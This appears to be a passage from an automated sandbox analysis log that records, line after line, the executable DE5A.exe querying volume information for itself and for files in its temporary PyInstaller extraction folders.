                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_lzma.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_bz2.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_sqlite3.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_socket.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\select.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_ssl.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_hashlib.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_queue.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\ucrtbase.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_ctypes.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
